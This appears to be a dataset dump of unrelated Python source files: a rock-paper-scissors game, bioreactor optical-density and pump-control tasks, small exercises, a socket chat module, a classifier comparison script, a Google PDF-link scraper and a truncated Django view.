\tdraw.multiline_text((x-sz[0]/2,y-sz[1]/2),label,font=fnt,fill=\"black\")\n# node(320,200,\"test\")\n# draw.line((0,0,640,400),fill=\"black\")\n# draw.line((0,400,640,0),fill=\"black\")\n# im.save(filename_png)\n\n### general graphing method\n# import networkx as nx\n# G = nx.DiGraph()\n# for name, properties in data[\"objects\"].items():\n# \tkeys = properties.keys();\n# \tif \"from\" in keys and \"to\" in keys:\n# \t\tf = properties[\"from\"];\n# \t\tt = properties[\"to\"];\n# \t\tG.add_nodes_from([f,t],weight=0);\n# \t\tif \"power_in\" in keys and \"power_out\" in keys:\n# \t\t\ti = properties[\"power_in\"]\n# \t\t\to = properties[\"power_out\"]\n# \t\t\tp = abs(complex(max(i,o).split(\" \")[0]))\n# \t\t\tif i > o:\n# \t\t\t\tG.add_edge(f,t,weight=p)\n# \t\t\telse:\n# \t\t\t\tG.add_edge(t,f,weight=p)\n# \t\telse:\n# \t\t\tG.add_edge(f,t,weight=0);\n# #H = nx.DiGraph()\n# print(\"Graph nodes:\",G.number_of_nodes())\n# print(\"Graph edges:\",G.number_of_edges())\n\n# import matplotlib.pyplot as plt\n\n# plt.figure(1);\n# H = nx.planar_layout(G)\n# nx.draw_networkx(G, H, node_size=2, with_labels=False, font_size=6, font_color='b', label=basename)\n# plt.tight_layout()\n# plt.savefig(filename_png, dpi=1000)\n","sub_path":"converters/json2png.py","file_name":"json2png.py","file_ext":"py","file_size_in_byte":8287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"68188796","text":"#!/usr/bin/env python3\nimport random\nimport os\nfrom colorama import Fore\n\n\"\"\"This program plays a game of Rock, Paper, Scissors between two Players,\nand reports both Player's scores each round.\"\"\"\n\nmoves = ['rock', 'paper', 'scissors']\n\n\"\"\"The Player class is the parent class for all of the Players\nin this game\"\"\"\n\n\nclass Player:\n # Master class for Every Player\n # To create a move of every player\n def move(self):\n return 'rock'\n\n # Learn the opponent moves\n def learn(self, my_move, their_move):\n self.their_move = their_move\n\n\ndef beats(one, two):\n # Check to see game conditions based on rules\n return ((one == 'rock' and two == 'scissors') or\n (one == 'scissors' and two == 'paper') or\n (one == 'paper' and two == 'rock'))\n\n\ndef clear_screen():\n # To clear the screen after every game\n os.system('cls' if os.name == 'nt' else 'clear')\n\n\nclass ReflectPlayer(Player):\n # Computer player reflects the Human player moves after each move\n def __init__(self):\n super().__init__()\n self.their_move = None\n\n def learn(self, my_move, their_move):\n self.their_move = their_move\n\n def move(self):\n # if it's first move select a random move else reflect HumanPlayer move\n if self.their_move is None:\n return random.choice(moves)\n return self.their_move\n\n\nclass CyclePlayer(Player):\n # CyclePlayer class cycles through moves by making\n # everytime a different move\n def __init__(self):\n super().__init__()\n self.my_move = None\n\n def learn(self, my_move, their_move):\n self.my_move = my_move\n\n def move(self):\n # Cycle through every move\n if self.my_move is None:\n return random.choice(moves)\n elif self.my_move == 'rock':\n return 'paper'\n elif self.my_move == 'paper':\n return 'scissors'\n elif self.my_move == 'scissors':\n return 'rock'\n\n\nclass RandomPlayer(Player):\n # RandomPlayer used to generate the moves randomly\n def move(self):\n return random.choice(moves)\n\n\nclass HumanPlayer(Player):\n # HumanPlayer to get the user's move\n def move(self):\n while True:\n try:\n # Foreground colors are used to color the Fonts\n move = input(f\"{Fore.RED}Rock, \\\n{Fore.BLUE}Paper, \\\n{Fore.YELLOW}Scissors?{Fore.RESET} > \").lower()\n if move in moves:\n return move\n except ValueError:\n pass\n\n\nclass Game:\n def __init__(self, p1, p2):\n # Initialize the Human Player and Computer Player\n self.p1 = p1\n self.p2 = p2\n\n def play_round(self):\n # play_round is a method to play rounds\n # Get the moves for Human and Computer Players\n move1 = self.p1.move()\n move2 = self.p2.move()\n\n print(f\"Player 1: {move1} Player 2: {move2}\")\n\n if beats(move1, move2):\n # beats function is used to find out who 'WINS'\n print(f\"{Fore.GREEN}** PLAYER ONE WINS **{Fore.RESET}\")\n self.p1_score += 1\n print(f\"Score: Player One - {self.p1_score}, \\\nPlayer Two - {self.p2_score}\")\n elif beats(move2, move1):\n print(f\"{Fore.LIGHTCYAN_EX}** PLAYER TWO WINS **{Fore.RESET}\")\n self.p2_score += 1\n print(f\"Score: Player One - {self.p1_score}, \\\nPlayer Two - {self.p2_score}\")\n else:\n print(f\"{Fore.LIGHTMAGENTA_EX}** TIE **{Fore.RESET}\")\n print(f\"Score: Player One - {self.p1_score}, \\\nPlayer Two - {self.p2_score}\")\n\n # learn method is used to learn the Human Player moves\n self.p1.learn(move1, move2)\n self.p2.learn(move2, move1)\n\n def play_game(self):\n # play_game is used to initiate the game\n print(f\"{Fore.RED}Rock{Fore.RESET} \\\n{Fore.BLUE}Paper{Fore.RESET} \\\n{Fore.YELLOW}Scissors,{Fore.RESET} \\\n{Fore.RESET}Go!\\n\")\n\n while True:\n try:\n # Get the play best of\n rounds = int(input(\"You want to play best of? \\n> \"))\n self.p1_score = 0\n self.p2_score = 0\n\n for round in range(rounds):\n print(f\"\\nRound {round+1} --\")\n self.play_round()\n\n # Display Final Scores\n print(f\"\\n{Fore.LIGHTMAGENTA_EX}Final Scores are: \\\n{Fore.LIGHTBLUE_EX}Player one - \\\n{self.p1_score}{Fore.RESET} and \\\n{Fore.LIGHTYELLOW_EX}Player two - \\\n{self.p2_score}{Fore.RESET}\")\n\n # Display who WINS, LOSE or TIE\n if self.p1_score > self.p2_score:\n print(f\"{Fore.GREEN}You Wins!{Fore.RESET}\")\n elif self.p1_score < self.p2_score:\n print(f\"{Fore.LIGHTCYAN_EX}You lose!{Fore.RESET}\")\n else:\n print(f\"{Fore.LIGHTMAGENTA_EX}Match is TIE!{Fore.RESET}\")\n break\n except ValueError:\n print(\"Please enter number.\")\n\n\ndef intro():\n # Display's introduction and rules of the game\n print(f\"\"\"\n******************************************\n* {Fore.GREEN}Welcome to the world of{Fore.RESET} *\n* {Fore.RED}Rock,{Fore.RESET} *\n* {Fore.BLUE}Paper,{Fore.RESET} *\n* {Fore.YELLOW}Scissors!{Fore.RESET} *\n* {Fore.GREEN}Rules:{Fore.RESET} *\n* {Fore.RED}1. Paper beats Rock;{Fore.RESET} *\n* {Fore.BLUE}2. Rock beats Scissors;{Fore.RESET} *\n* {Fore.YELLOW}3. Scissors beat Paper.{Fore.RESET} *\n******************************************\n\"\"\")\n\n\nif __name__ == '__main__':\n game = Game(HumanPlayer(), random.choice(\n [ReflectPlayer(), CyclePlayer()]))\n\n while True:\n clear_screen()\n intro()\n game.play_game()\n play_again = input(\"\\nWant to play again y/n? \").lower()\n if play_again == 'n':\n print(\"Bye!\")\n break\n","sub_path":"rps.py","file_name":"rps.py","file_ext":"py","file_size_in_byte":6080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"578815844","text":"from collections import deque\nfrom threading import Thread\nfrom time import sleep\nfrom typing import Dict\n\nimport numpy as np\n\nfrom core.data.command import Command\nfrom core.device.abstract import Connector\nfrom core.device.manager import DeviceManager\nfrom core.task.abstract import BaseTask\nfrom core.task.manager import TaskManager\nfrom core.utils.observable import Observable, Observer\n\n\nclass PBRMeasureAll(BaseTask):\n def __init__(self, config):\n self.__dict__.update(config)\n\n required = ['sleep_period', 'lower_tol', 'upper_tol', 'od_channel',\n 'max_outliers', 'device_id', 'pump_id']\n\n self.validate_attributes(required, type(self).__name__)\n\n self.latest_values = deque(maxlen=2)\n self.outliers = 0\n\n self.device: Connector = DeviceManager().get_device(self.device_id)\n self.average_od = self.measure_initial_od_average()\n self.od = Observable()\n\n super(PBRMeasureAll, self).__init__()\n\n self.commands_to_execute: Dict[str, dict] = {\n \"pwm_settings\": {\n \"id\": \"12\"\n },\n \"light_0\": {\n \"id\": \"9\",\n \"args\": [0]\n },\n \"light_1\": {\n \"id\": \"9\",\n \"args\": [1]\n },\n \"od_0\": {\n \"id\": \"5\",\n \"args\": [0, 30]\n },\n \"od_1\": {\n \"id\": \"5\",\n \"args\": [1, 30]\n },\n \"ph\": {\n \"id\": \"4\",\n \"args\": [5, 0]\n },\n \"temp\": {\n \"id\": \"2\"\n },\n \"pump\": {\n \"id\": \"6\",\n \"args\": [self.pump_id]\n },\n \"o2\": {\n \"id\": \"14\"\n },\n \"ft_0\": {\n \"id\": \"17\",\n \"args\": [0]\n },\n \"ft_1\": {\n \"id\": \"17\",\n \"args\": [1]\n }\n }\n\n def get_od_for_init(self):\n cmd = Command(self.device_id, \"5\",\n [self.od_channel],\n self.task_id,\n is_awaited=True)\n\n self.device.post_command(cmd)\n cmd.await_cmd()\n if cmd.is_valid:\n return cmd.response\n\n def measure_initial_od_average(self):\n data = []\n # collect the OD value from 5 measurements\n while len(data) < 5:\n od = self.get_od_for_init()\n if od is not None:\n data.append(od['od'])\n\n data.sort()\n computed = False\n average = 0\n\n # calculate the average OD from the measured data\n while not computed:\n\n mean = np.mean(data)\n median = np.median(data)\n\n if len(data) < 2:\n computed = True\n average = data[0]\n\n if mean / median <= 1:\n\n if mean / median >= 0.9:\n computed = True\n average = mean\n else:\n data = data[1:]\n else:\n data = data[:-1]\n return average\n\n def handle_outlier(self, measured_od) -> bool:\n \"\"\"\n Decides whether the measured OD value is an outlier or not.\n :param measured_od: optical density value\n :return: True if it is an outlier, False otherwise\n \"\"\"\n lower_tol = self.calculate_tolerance(-self.lower_tol)\n upper_tol = self.calculate_tolerance(self.upper_tol)\n\n if lower_tol <= measured_od <= upper_tol:\n self.outliers = 0\n self.average_od = self.calculate_average()\n return False\n else:\n self.outliers += 1\n if self.outliers > self.max_outliers:\n self.outliers = 0\n self.average_od = self.calculate_average()\n return False\n else:\n return True\n\n def calculate_tolerance(self, value):\n return ((100 + value) / 100) * self.average_od\n\n def calculate_average(self):\n \"\"\"\n Helper method which calculates the average of a list while removing the elements from the objects deque.\n :return: The average of the deque\n \"\"\"\n my_list = []\n while self.latest_values:\n my_list.append(self.latest_values.pop())\n\n return sum(my_list) / len(my_list)\n\n def start(self):\n t = Thread(target=self._run)\n t.start()\n\n def _run(self):\n self.average_od = self.measure_initial_od_average()\n od_variant = 'od_1' if self.od_channel == 1 else 'od_0'\n\n while self.is_active:\n commands = []\n\n for _name, _command in self.commands_to_execute.items():\n command = Command(self.device_id,\n _command.get(\"id\"),\n _command.get(\"args\", []),\n self.task_id,\n is_awaited=True)\n commands.append((_name, command))\n self.device.post_command(command, 1)\n\n for name, command in commands:\n command.await_cmd()\n if command.is_valid and name == od_variant:\n od = command.response['od']\n self.latest_values.appendleft(od)\n od_is_outlier = self.handle_outlier(od)\n if not od_is_outlier:\n self.od.value = od\n command.response = {'od': od, 'outlier': od_is_outlier, 'channel': self.od_channel}\n command.save_data_to_db()\n\n sleep(self.sleep_period)\n\n def end(self):\n self.is_active = False\n\n\nclass ePBRMeasureAll(PBRMeasureAll):\n def __init__(self, config):\n super(ePBRMeasureAll, self).__init__(config)\n self.commands_to_execute: Dict[str, dict] = {\n \"od_0\": {\n \"id\": \"5\",\n \"args\": [0]\n },\n \"od_1\": {\n \"id\": \"5\",\n \"args\": [1]\n },\n \"ph\": {\n \"id\": \"4\"\n },\n \"temp\": {\n \"id\": \"2\"\n }\n }\n\n\nclass PBRGeneralPump(BaseTask, Observer):\n\n def __init__(self, config):\n self.__dict__.update(config)\n\n required = ['min_od', 'max_od', 'pump_id', 'device_id',\n 'measure_all_task_id', 'pump_on_command', 'pump_off_command']\n\n self.validate_attributes(required, type(self).__name__)\n\n self.is_pump_on = False\n\n self.device = DeviceManager().get_device(self.device_id)\n self.od_task: PBRMeasureAll = TaskManager().get_task(self.measure_all_task_id)\n\n self.od_task.od.observe(self)\n\n super(PBRGeneralPump, self).__init__()\n\n def get_pump_command(self, state: bool) -> Command:\n if state:\n return Command(self.device_id, self.pump_on_command.get(\"command_id\"),\n eval(self.pump_on_command.get(\"arguments\", \"[]\")), self.task_id)\n else:\n return Command(self.device_id, self.pump_off_command.get(\"command_id\"),\n eval(self.pump_off_command.get(\"arguments\", \"[]\")), self.task_id)\n\n def update(self, observable: Observable):\n self.stabilize(observable.value)\n\n def start(self):\n pass\n\n def end(self):\n pass\n\n def is_od_value_too_high(self, od):\n return od > self.max_od\n\n def is_od_value_too_low(self, od):\n return od < self.min_od\n\n def turn_pump_on(self):\n self.change_pump_state(True)\n\n def turn_pump_off(self):\n self.change_pump_state(False)\n\n def change_pump_state(self, state: bool):\n for try_n in range(5):\n command = self.get_pump_command(state)\n self.device.post_command(command, 1)\n command.await_cmd()\n\n if isinstance(command.response['success'], bool) and command.response['success']:\n command.save_command_to_db()\n self.is_pump_on = state\n return\n raise ConnectionError\n\n def stabilize(self, od):\n if self.is_od_value_too_high(od):\n if not self.is_pump_on:\n self.turn_pump_on()\n elif self.is_od_value_too_low(od):\n if self.is_pump_on:\n self.turn_pump_off()\n","sub_path":"custom/tasks/PBR.py","file_name":"PBR.py","file_ext":"py","file_size_in_byte":8439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"306260824","text":"import os\nimport requests\n\nrecords_list = []\nzname = \"tempdata/ssa-babynames-nationwide-2014.txt\"\nf = open(zname, 'r')\nfor line in f:\n name, sex, babies = line.strip().split(',')\n row = [name, sex, int(babies)]\n records_list.append(row)\n\nrecords_list.sort(key=lambda x: x[2], reverse=True)\n\nfor x in range(0, 10):\n name, sex, baby = records_list[x]\n print(str(x+1)+\". \"+name+\",\"+sex+\",\"+str(baby))\n","sub_path":"exercises/0013-sorted-names/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"56311447","text":"import socket\nimport select\nimport json\nimport time\n\naddress = '127.0.0.1'\nport = 7777\n\nclass Sock:\n def __init__(self, family, type):\n self.family = family\n self.type = type\n\n def sock(self):\n return socket.socket(self.family, self.type, proto=0)\n\nclass JIM_message:\n def __init__(self, user_name, status):\n self.user = user_name\n self.status = status\n\n def message(self):\n return json.dumps({\n \"action\": \"presence\",\n \"time\": time.time(),\n \"type\": \"status\",\n \"user\": {\n \"account_name\": self.user,\n \"status\": self.status\n }\n }\n )\n\nclass JIM_response:\n def __init__(self, message):\n self.message = message\n\n def res_message(self):\n return json.loads(self.message.decode(\"utf-8\"))\n\n\ndef server_mainloop(sock, clients):\n while 1:\n try:\n connect, addr = sock.accept()\n except OSError as err:\n pass\n else:\n print(\"Connection request from %s\" % str(addr))\n clients.append(connect)\n finally:\n w = []\n try:\n r, w, err = select.select([], clients, [], 1)\n except Exception as exc:\n pass\n for i in w:\n try:\n user_name = input(\"Please, print your name: \")\n status = input(\"Please, print your status: \")\n msg = JIM_message(user_name, status)\n msg_json = JIM_message.message(msg)\n i.send(msg_json.encode(\"utf-8\"))\n except:\n clients.remove(i)\n\n\ndef client_mainloop(s):\n\n while 1:\n message = s.recv(1024)\n message1 = JIM_response(message)\n message2 = JIM_response.res_message(message1)\n print(message2)\n\n s.close()\n","sub_path":"HW_3/content.py","file_name":"content.py","file_ext":"py","file_size_in_byte":1998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"326387782","text":"def robot_in_a_grid(grid):\n stack = []\n modified_dfs(1, 1, grid, stack)\n stack.reverse()\n return stack\n\n\ndef modified_dfs(row, col, grid, stack):\n if row >= len(grid) or col >= len(grid[0]):\n return False\n \n if grid[row][col] == '#':\n return False\n\n if grid[row][col] == '*':\n return True\n\n stack.append('R')\n if modified_dfs(row, col + 1, grid, stack):\n return True\n stack.pop()\n stack.append('D')\n if modified_dfs(row + 1, col, grid, stack):\n return True\n stack.pop()\n\n return False\n\n\ndef main():\n maze = ['#####',\n '#+..#',\n '#.###',\n '#...#',\n '#..##',\n '##..*']\n stack = robot_in_a_grid(maze)\n while len(stack) != 0:\n print(stack.pop())\n\n\nmain()\n \n\n\n","sub_path":"ctci/ch8/robotinagrid.py","file_name":"robotinagrid.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"432228129","text":"import warnings\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom sklearn.ensemble import RandomForestClassifier, ExtraTreesClassifier\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.model_selection import KFold\r\nfrom sklearn.model_selection import train_test_split\r\nfrom keras.layers import Dense\r\nfrom keras.models import Sequential\r\nfrom sklearn.metrics import accuracy_score\r\nfrom sklearn.multiclass import OneVsRestClassifier\r\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\r\nfrom sklearn.svm import SVC\r\nfrom sklearn.svm import LinearSVC\r\nfrom sklearn.metrics import classification_report, confusion_matrix, accuracy_score, f1_score, recall_score, precision_score\r\nfrom sklearn import datasets, tree\r\nfrom sklearn.decomposition import PCA\r\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\r\nfrom sklearn.feature_selection import SelectKBest\r\nfrom sklearn.feature_selection import chi2\r\n\r\ndef extract_data():\r\n\r\n filename1 = './Data/DEI_trial_by_trial_Right.xlsx'\r\n filename2 = './Data/DEI_trial_by_trial_Wrong.xlsx'\r\n filename3 = './Data/esec_trial_by_trial_Right.xlsx'\r\n filename4 = './Data/esec_trial_by_trial_Wrong.xlsx'\r\n\r\n filename = [filename1, filename2, filename3, filename4]\r\n right_wrong_files = [1, 0, 1, 0]\r\n\r\n number_trial_training = 12\r\n number_trial_testing = 36\r\n\r\n \r\n X = []\r\n y = []\r\n listIndex = [\r\n 'DEI_01', 'DEI_02', 'DEI_03', 'DEI_04', 'DEI_05', 'DEI_06', 'DEI_07', 'DEI_08',\r\n 'DEI_09', 'DEI_10', 'DEI_11', 'DEI_12', 'DEI_13', 'DEI_14', 'DEI_15', 'DEI_16',\r\n 'DEI_17', 'DEI_18', 'DEI_19', 'DEI_20', 'DEI_21', 'DEI_22', 'DEI_23', 'DEI_24',\r\n 'ESEC_01', 'ESEC_02', 'ESEC_03', 'ESEC_04', 'ESEC_05', 'ESEC_07', 'ESEC_08',\r\n 'ESEC_09', 'ESEC_10', 'ESEC_11', 'ESEC_12', 'ESEC_13', 'ESEC_14', 'ESEC_15', 'ESEC_16',\r\n 'ESEC_17', 'ESEC_18', 'ESEC_19', 'ESEC_20', 'ESEC_21'\r\n ]\r\n\r\n list_right_wrong = np.zeros((len(listIndex), number_trial_training + number_trial_testing + 1), dtype=object)\r\n\r\n i = 0\r\n while i < len(list_right_wrong):\r\n j = 0\r\n while j < len(list_right_wrong[i]):\r\n list_right_wrong[i][j] = -1\r\n j += 1\r\n i += 1\r\n\r\n list_gender = [\r\n 'M', 'F', 'F', 'M', 'M', 'M', 'M', 'F', # DEI 1-8\r\n 'F', 'M', 'M', 'M', 'M', 'M', 'M', 'M', # DEI 9-16\r\n 'M', 'M', 'M', 'F', 'F', 'F', 'M', 'M', # DEI 17-24\r\n 'M', 'F', 'F', 'M', 'F', 'M', 'M', # ESEC 1-8\r\n 'M', 'F', 'F', 'M', 'M', 'M', 'F', 'M', # ESEC 9-16\r\n 'M', 'F', 'F', 'F', 'M' # ESEC 17-21\r\n ]\r\n\r\n index = 0\r\n while index < len(filename):\r\n y = []\r\n i = 1\r\n while i <= (number_trial_training + number_trial_testing):\r\n if i <= number_trial_training:\r\n worksheet = pd.read_excel(filename[index], sheet_name='TRIAL TRAINING' + str(i)) # doctest: +SKIP\r\n y.append('TRIAL TRAINING' + str(i))\r\n else:\r\n worksheet = pd.read_excel(filename[index], sheet_name='TRIAL TESTING' + str(i-number_trial_training)) # doctest: +SKIP\r\n y.append('TRIAL TESTING' + str(i-number_trial_training))\r\n\r\n X = list(worksheet[worksheet.columns[-1]])\r\n\r\n j = 0\r\n while j < len(X):\r\n subject = listIndex.index(X[j])\r\n\r\n if list_right_wrong[subject][i - 1] == 1 or list_right_wrong[subject][i - 1] == 0:\r\n list_right_wrong[subject][i - 1] = -1\r\n else:\r\n list_right_wrong[subject][i - 1] = right_wrong_files[index]\r\n \r\n if list_gender[subject] == 'M':\r\n list_right_wrong[subject][-1] = 'Rapaz'\r\n else:\r\n list_right_wrong[subject][-1] = 'Rapariga'\r\n \r\n j += 1\r\n \r\n i += 1\r\n \r\n index += 1\r\n\r\n y.append('GENDER')\r\n \r\n df = pd.DataFrame(list_right_wrong, index = listIndex, columns = y)\r\n return df\r\n\r\n\r\ndef divide_data_train_test(X, y):\r\n \r\n print(\"X:\\n\", X)\r\n print(\"y:\\n\", y)\r\n X_train, X_val_and_test, y_train, y_val_and_test = train_test_split(X, y, test_size=0.35, random_state=1)\r\n X_val, X_test, y_val, y_test = train_test_split(X_val_and_test, y_val_and_test, test_size=0.6, random_state=1)\r\n return X_train, X_test, y_train, y_test, X_val, y_val\r\n\r\n\r\ndef kFold(X, y):\r\n\r\n kf = KFold(n_splits=5)\r\n print(kf.get_n_splits(X))\r\n\r\n for train_index, test_index in kf.split(X):\r\n print(\"TRAIN:\", train_index, \"TEST:\", test_index)\r\n X_train, X_test = np.array(X)[train_index], np.array(X)[test_index]\r\n y_train, y_test = np.array(y)[train_index], np.array(y)[test_index]\r\n\r\n\r\n return X_train, X_test, y_train, y_test\r\n\r\n\r\ndef PCA_decomp(X_train, X_test):\r\n pca = PCA(n_components=2)\r\n\r\n X_train = pca.fit_transform(X_train)\r\n X_test = pca.transform(X_test)\r\n\r\n print(pca.components_)\r\n print(pca.explained_variance_)\r\n\r\n return X_train, X_test\r\n\r\n\r\ndef Fisher():\r\n clf = LinearDiscriminantAnalysis()\r\n clf.fit(X, y)\r\n clf.predict([[-0.8, -1]])\r\n\r\ndef Decision_Tree_Classifier(X_train, X_test, y_train):\r\n dtc_clf = tree.DecisionTreeClassifier()\r\n dtc_clf = dtc_clf.fit(X_train, y_train)\r\n dtc_prediction = dtc_clf.predict(X_test)\r\n return dtc_prediction\r\n\r\ndef Random_Forest_Classifier(X_train, X_test, y_train):\r\n rfc_clf = RandomForestClassifier()\r\n rfc_clf.fit(X_train, y_train)\r\n rfc_prediction = rfc_clf.predict(X_test)\r\n return rfc_prediction\r\n\r\n\r\ndef Logistic_Regression(X_train, X_test, y_train):\r\n # LogisticRegression\r\n l_clf = OneVsRestClassifier(LogisticRegression(solver='lbfgs'))\r\n l_clf.fit(X_train, y_train)\r\n l_prediction = l_clf.predict(X_test)\r\n return l_prediction\r\n\r\ndef neural_network(X_train, X_test, y_train, y_test, X_val, y_val):\r\n # Initialising the ANN\r\n model = Sequential()\r\n\r\n # Adding the input layer and the first hidden layer\r\n model.add(Dense(32, activation='relu', input_dim=48))\r\n\r\n # Adding the second hidden layer\r\n model.add(Dense(units=32, activation='relu'))\r\n\r\n # Adding the output layer\r\n model.add(Dense(units=1, activation='sigmoid'))\r\n\r\n model.compile(optimizer='adam', loss='mean_squared_error', metrics=['accuracy'])\r\n\r\n\r\n # Fit the model weights.\r\n hist = model.fit(X_train, y_train, batch_size=64, epochs=100, verbose=1, validation_data=(X_val, y_val))\r\n\r\n model.summary()\r\n\r\n y_pred = model.predict(X_test)\r\n # Converting predictions to label\r\n pred = list()\r\n for i in range(len(y_pred)):\r\n pred.append(np.int(np.round(y_pred[i])))\r\n # Converting one hot encoded test label to label\r\n test = list()\r\n for i in range(len(y_test)):\r\n test.append(y_test[i])\r\n\r\n \"\"\"\r\n a = accuracy_score(pred, test)\r\n print(\"y_label:\", y_test)\r\n print(\"y_pred:\", y_pred)\r\n print(\"\\n\")\r\n print(\"%s: %.2f%%\" % (model.metrics_names[1], a * 100))\r\n print(\"label:\", test)\r\n print(\"pred:\", pred)\r\n print(\"The Mean Absolute Error: %.0f class\" % mean_absolute_error(y_test, pred, multioutput='raw_values'))\r\n print(\"The Median Absolute Error: %.0f class\" % median_absolute_error(y_test, pred, multioutput='raw_values'))\r\n\r\n\r\n\r\n plt.plot(hist.history['loss'])\r\n plt.plot(hist.history['val_loss'])\r\n plt.title('Model loss')\r\n plt.ylabel('Loss')\r\n plt.xlabel('Epoch')\r\n plt.legend(['Train', 'Val'], loc='upper right')\r\n plt.show()\r\n\r\n plt.plot(hist.history['accuracy'])\r\n plt.plot(hist.history['val_accuracy'])\r\n plt.title('Model accuracy')\r\n plt.ylabel('Accuracy')\r\n plt.xlabel('Epoch')\r\n plt.legend(['Train', 'Val'], loc='lower right')\r\n plt.show()\r\n\r\n \"\"\"\r\n\r\n return pred\r\n\r\ndef SVM(X_train, X_test, y_train):\r\n\r\n svclassifier = OneVsRestClassifier(LinearSVC(C=1.0, max_iter=1000, tol=1e-05, verbose=0))\r\n svclassifier.fit(X_train, y_train)\r\n svm_pred = svclassifier.predict(X_test)\r\n return svm_pred\r\n\r\n\r\nif __name__ == \"__main__\":\r\n warnings.filterwarnings(\"ignore\", category=FutureWarning)\r\n warnings.filterwarnings(\"ignore\", category=DeprecationWarning)\r\n data_frame = extract_data()\r\n data_frame = pd.get_dummies(data_frame, columns=['GENDER'])\r\n features = data_frame.columns\r\n\r\n X = data_frame[features[:-2]]\r\n y = data_frame[features[-2]]\r\n print(\"X:\", X)\r\n print(\"y:\", y)\r\n\r\n\r\n X_train, X_test, y_train, y_test, X_val, y_val = divide_data_train_test(X, y)\r\n #X_train, X_test, y_train, y_test = kFold(X, y)\r\n\r\n #X_train, X_test = PCA_decomp(X_train, X_test)\r\n\r\n print(\"X_train:\", X_train.shape)\r\n print(\"X_test:\", X_test.shape)\r\n\r\n # printing the shapes of the new y objects\r\n print(\"Y_train:\", y_train.shape)\r\n print(\"Y_test:\", y_test.shape)\r\n\r\n\r\n\r\n pred = neural_network(X_train, X_test, y_train, y_test, X_val, y_val)\r\n\r\n dtc_prediction = Decision_Tree_Classifier(X_train, X_test, y_train)\r\n rfc_prediction = Random_Forest_Classifier(X_train, X_test, y_train)\r\n l_prediction = Logistic_Regression(X_train, X_test, y_train)\r\n svm_pred = SVM(X_train, X_test, y_train)\r\n\r\n # accuracy scores\r\n neural_acc = accuracy_score(pred, y_test)\r\n print(\"Neural: \",neural_acc)\r\n\r\n dtc_tree_acc = accuracy_score(dtc_prediction, y_test)\r\n print(\"Decision tree: \",dtc_tree_acc)\r\n\r\n rfc_acc = accuracy_score(rfc_prediction, y_test)\r\n print(\"Random Forest: \",rfc_acc)\r\n\r\n l_acc = accuracy_score(l_prediction, y_test)\r\n print(\"Logistic regression: \",l_acc)\r\n svm_acc = accuracy_score(svm_pred, y_test)\r\n print(\"SVM: \",svm_acc)\r\n\r\n\r\n\r\n cm = confusion_matrix(y_test, rfc_prediction)\r\n\r\n # Transform to df for easier plotting\r\n cm_df = pd.DataFrame(cm,\r\n index=['0', '1'],\r\n columns=['0', '1'])\r\n\r\n plt.figure(figsize=(5.5, 4))\r\n sns.heatmap(cm_df, annot=True)\r\n plt.title('Random Forest')\r\n plt.ylabel('True label')\r\n plt.xlabel('Predicted label')\r\n plt.show()\r\n\r\n classifiers = ['Neural Network', 'Decision Tree', 'Random Forest', 'Logistic Regression', 'SVM']\r\n\r\n accuracy = np.array([neural_acc, dtc_tree_acc, rfc_acc, l_acc, svm_acc])\r\n\r\n max_acc = np.argmax(accuracy)\r\n print(classifiers[max_acc] + ' is the best classifier for this problem')\r\n","sub_path":"Project_Raven.py","file_name":"Project_Raven.py","file_ext":"py","file_size_in_byte":10576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"404932021","text":"from bs4 import BeautifulSoup\nfrom urllib.request import Request, urlopen\nfrom urllib.parse import urlparse, parse_qs\n\n\nclass GoogleSearch:\n\n def __init__(self):\n self.url = \"\"\n self.user_agent = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)'\n self.html = \"\"\n self.links = list()\n self.pdfs = list()\n\n def query(self, search):\n search = search.replace(' ', '+')\n self.url = \"https://www.google.com/search?q=\" + search + \"&num=100\" # maybe change 100 to 50-80?\n return self.url\n\n def get_page(self):\n r = Request(self.url)\n r.add_header('User-Agent', self.user_agent)\n response = urlopen(r)\n self.html = response.read()\n response.close()\n\n def get_results(self):\n hashes = set()\n self.get_page()\n\n soup = BeautifulSoup(self.html, 'html.parser')\n\n for anchor in soup.find(id='search').find_all('a'):\n if not anchor.parent or anchor.parent.name.lower() != \"h3\":\n continue\n\n try:\n link = anchor['href']\n except KeyError:\n continue\n\n link = self.filter_result(link)\n if not link:\n continue\n\n h = hash(link)\n if h in hashes:\n continue\n hashes.add(h)\n\n self.links.append(link)\n\n def get_pdfs(self):\n for link in self.links:\n if link.endswith(\".pdf\"):\n self.pdfs.append(link)\n\n return self.pdfs\n\n @staticmethod\n def filter_result(link):\n parse = urlparse(link, 'http')\n\n if link.startswith('/url'):\n link = parse_qs(parse.query)['q'][0]\n\n parse = urlparse(link, 'http')\n if parse.netloc and 'google' not in parse.netloc:\n return link\n","sub_path":"googlesearch.py","file_name":"googlesearch.py","file_ext":"py","file_size_in_byte":1849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"356496880","text":"#coding: utf-8\n\nfrom django.contrib import messages\nfrom django.shortcuts import render, redirect\nfrom catalog.models import Builder\nfrom catalog.forms.FormBuilder import FormBuilder\n\n\ndef index(request):\n\n\tbuilders = Builder.objects.all()\n\n\treturn render(request, 'builder/index.html', {\n\t\t'builders': builders\n\t})\n\ndef add(request):\n\t\n\tif request.method == 'POST':\n\n\t\tform = FormBuilder(request.POST)\n\n\t\tif form.is_valid():\n\t\t\tbuilder = Builder()\n\t\t\tbuilder.name = request.POST['name']\n\t\t\tbuilder.phone = request.POST['phone']\n\t\t\tbuilder.address = 